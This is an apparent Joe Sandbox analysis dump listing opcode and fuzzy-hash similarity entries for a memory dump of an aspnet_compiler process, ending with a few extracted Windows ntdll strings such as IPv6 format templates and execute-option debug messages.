                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
                                                    • Instruction ID: cfaaafe9771839168c619591c60e100dd126ffec722574b78cbdf098f969b0bd
                                                    • Opcode Fuzzy Hash: 3a4bbacf9a7fd8ca746f7c3b98dcfbd1474cc5090658fe8a6801581020eb9dc6
                                                    • Instruction Fuzzy Hash: 9590022524151802E140715CC4147070016D7D0601F55C012E0424554DC6168A6567B2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                                    • Instruction ID: ed5a516fa6b38b7f2f1d80e13d65822a27558f884b6d789d2e74400fe52d2c97
                                                    • Opcode Fuzzy Hash: 2cfe9f98633521cb04237dc7a34a87c7a369b52c89a923c0741f835a12128853
                                                    • Instruction Fuzzy Hash: 8690023560591012A140715C88845464015A7E0301B55C012E0824554CCA148A565362
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                                    • Instruction ID: b50b7bbfca148bafb12487d1d1b6c65ebec9e1a8ee3b04032b9aafd3d8ad8af1
                                                    • Opcode Fuzzy Hash: afc980b3b0bd713822c0f40b15fdcbed85530554c5deb1e31f024653e464be14
                                                    • Instruction Fuzzy Hash: 45900265601610425140715C88044066015A7E1301395C116E0954560CC6188955936A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
                                                    • Instruction ID: f4dcbe2f876b82df825029d6e11a5b883b781860671f80d9dd05dfc58195520b
                                                    • Opcode Fuzzy Hash: f6824c0c60074f83aec7ca732dfc4f220b16d27316723357585e3b15b9db3150
                                                    • Instruction Fuzzy Hash: DC90022524556102E150715C84046164015B7E0201F55C022E0C14594DC55589556322
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
                                                    • Instruction ID: ac004e06c9c71e36a80ae1afa386c36438b5bf6d980b0c3168367c7900d40e11
                                                    • Opcode Fuzzy Hash: aa736e05d71b532488073c1d8e7eb637f40b800e98f0c9c4519815564e54a9f8
                                                    • Instruction Fuzzy Hash: 3490023520151802E104715C8804686001597D0301F55C012E6424655ED66589917232
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
                                                    • Instruction ID: 66baa0988b91f88bae7567c4a065ba0ca8ace8b7a238814669fc1d18d5efbc5a
                                                    • Opcode Fuzzy Hash: bd091f055c858667016e2a0a40fc1f957963f2f33b6de58c29eb285ba98b1b4a
                                                    • Instruction Fuzzy Hash: 1390023560551802E150715C8414746001597D0301F55C012E0424654DC7558B5577A2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
                                                    • Instruction ID: 7b6de717d04d578439c8de3000176107b49d1e69da826d01f98aa7a10c0c4ff8
                                                    • Opcode Fuzzy Hash: b42778062a81e522a321209be3c14306084f86a0049105c92e2f13f290d0fef4
                                                    • Instruction Fuzzy Hash: BB90023520555842E140715C8404A46002597D0305F55C012E0464694DD6258E55B762
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
                                                    • Instruction ID: c066160ec28f5beb0148435097454f2a55734d6d649a9c50b8d031d6b0a14ff6
                                                    • Opcode Fuzzy Hash: 190576c7258472dc8d2d91b080da80d7395272e162186a25e7c8e3f6933002b9
                                                    • Instruction Fuzzy Hash: E690023520151802E180715C840464A001597D1301F95C016E0425654DCA158B5977A2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
                                                    • Instruction ID: 5df8430bafc2a96321f66e6d40a622b5b92e571b16583fdc0f3f62be33814369
                                                    • Opcode Fuzzy Hash: 482c097b452e64ef4ef878ff03e8b4a3f6e8a88e2094564eafb24fa1f250745a
                                                    • Instruction Fuzzy Hash: F89002A5201650925500B25CC404B0A451597E0201B55C017E1454560CC52589519236
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
                                                    • Instruction ID: 9ff5462fbf18240dcec5d2caf507bd818b7d71cfb6c30bd12f46db22c72a8dd0
                                                    • Opcode Fuzzy Hash: c49ced34569e5a6b3f465c865f98b69ffcd850838b22fce6eb54b721f955139e
                                                    • Instruction Fuzzy Hash: 3D90043D311510031105F55C47045070057D7D5351355C033F1415550CD731CD715333
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
                                                    • Instruction ID: 43ab85abedfba76fa2b69735bdd00e5012b9d28fe89aea4a6aa6fab7ab34c2c3
                                                    • Opcode Fuzzy Hash: a0670fbd1dd8a4448d4de2cc76d0f1756ba4e1141bf17e55cea208f0319bf72d
                                                    • Instruction Fuzzy Hash: B2900229221510021145B55C460450B0455A7D6351395C016F1816590CC62189655322
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
                                                    • Instruction ID: 78d799a7d9ba078d425175d8babcbec8f55bf7b33ef422a9d57828c073fb2ea6
                                                    • Opcode Fuzzy Hash: 44f6b4d72437e4934b98a83c095cbe1f72fca93573589f9347b351d9c2e0d418
                                                    • Instruction Fuzzy Hash: B490022520555442E100755C9408A06001597D0205F55D012E1464595DC6358951A232
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                                    • Instruction ID: f6021ed495f5f2aa8f8e08767c6e668882adaf536544cb56668249e49d0b7ef2
                                                    • Opcode Fuzzy Hash: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                                    • Instruction Fuzzy Hash: 2890023520251142A540725C9804A4E411597E1302B95D416E0415554CC91489615322
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                                    • Instruction ID: ecfa70658b9b39eb20faddcd07cbe90cf9d34dc28c44ff2749ae8877a6ea2815
                                                    • Opcode Fuzzy Hash: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                                    • Instruction Fuzzy Hash: 2290022D21351002E180715C940860A001597D1202F95D416E0415558CC91589695322
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                                    • Instruction ID: 8628e9bab6a4280b3c2e93b823e84efe5b47ea11ff470ed144b555e552725cd5
                                                    • Opcode Fuzzy Hash: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                                    • Instruction Fuzzy Hash: BE90022530151003E140715C94186064015E7E1301F55D012E0814554CD91589565323
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                                    • Instruction ID: e7d6ee4cf95f8375d5b0b8343d4699337ff36a6468ed4792a5af16eb92146ff6
                                                    • Opcode Fuzzy Hash: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                                    • Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                                    • Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
                                                    • Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                                    • Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                                    • Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
                                                    • Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                                    • Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                                    • Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
                                                    • Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                                    • Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                                    • Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
                                                    • Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                                    • Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                                    • Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
                                                    • Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                                    • Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                                    • Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
                                                    • Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                                    • Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                                    • Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
                                                    • Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                                    • Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                                    • Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
                                                    • Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                                    • Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                                    • Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
                                                    • Opcode Fuzzy Hash: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                                    • Instruction Fuzzy Hash: 2A90023520191402E100715C881470B001597D0302F55C012E1564555DC62589516672
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                                    • Instruction ID: 15ccf085ea955a9f8cf04d686fd7131f5c102fe7d2daacf0ffed59c704dd16b3
                                                    • Opcode Fuzzy Hash: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                                    • Instruction Fuzzy Hash: B790023520191402E100715C8808747001597D0302F55C012E5564555EC665C9916632
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                                    • Instruction ID: bd63e9d360c8fc32940e01b5e3bfe276d81c83880dc6b2e3e915f593f13d48ff
                                                    • Opcode Fuzzy Hash: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                                    • Instruction Fuzzy Hash: 9F900225601510425140716CC8449064015BBE1211755C122E0D98550DC55989655766
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                                    • Instruction ID: f9e4b64ccdf6de43697c09f54e28a01be5dd1c21a44b465b23d6e37b0fffc015
                                                    • Opcode Fuzzy Hash: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                                    • Instruction Fuzzy Hash: 58900225211D1042E200756C8C14B07001597D0303F55C116E0554554CC91589615622
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                                    • Instruction ID: 59a296c1882d376c5ffca640d23a70516df835ee6199f4ea7046ba19122cb285
                                                    • Opcode Fuzzy Hash: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                                    • Instruction Fuzzy Hash: B990022530151402E102715C84146060019D7D1345F95C013E1824555DC6258A53A233
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                                    • Instruction ID: f12143e3dfc50a638a691c591602be029386b53a50cea896c01e4641a6047eb6
                                                    • Opcode Fuzzy Hash: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                                    • Instruction Fuzzy Hash: EC90022560151502E101715C8404616001A97D0241F95C023E1424555ECA258A92A232
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                                    • Instruction ID: 3222d2b25440912e98916495796444b4e6e13cfb5da51f9e8f70c26cbc571d53
                                                    • Opcode Fuzzy Hash: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                                    • Instruction Fuzzy Hash: 5D90027520151402E140715C8404746001597D0301F55C012E5464554EC6598ED56766
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                                    • Instruction ID: 48d62672ad2af1dd8117a263e1245aef0e18e92ea8fc19626cffa350247d4461
                                                    • Opcode Fuzzy Hash: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                                    • Instruction Fuzzy Hash: FC90026520191403E140755C8804607001597D0302F55C012E2464555ECA298D516236
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 8180b858bc80128465cbe62474224157435153773c8158baaad54eb40a782727
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                                    • Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
                                                    • Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                                    • Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0
                                                    Strings
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
                                                    • Execute=1, xrefs: 010F4713
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
                                                    • ExecuteOptions, xrefs: 010F46A0
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                                    • Instruction ID: 8580cd0a3ef20cc38327123b3428a9ad663941a9626619f2f98fe76e5db42c8c
                                                    • Opcode Fuzzy Hash: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                                    • Instruction Fuzzy Hash: 60510A3164021A6AEB25AB68DCC6FEE77B8FF98704F0400EDD685AB1D1D7709A45CF50
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1050000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
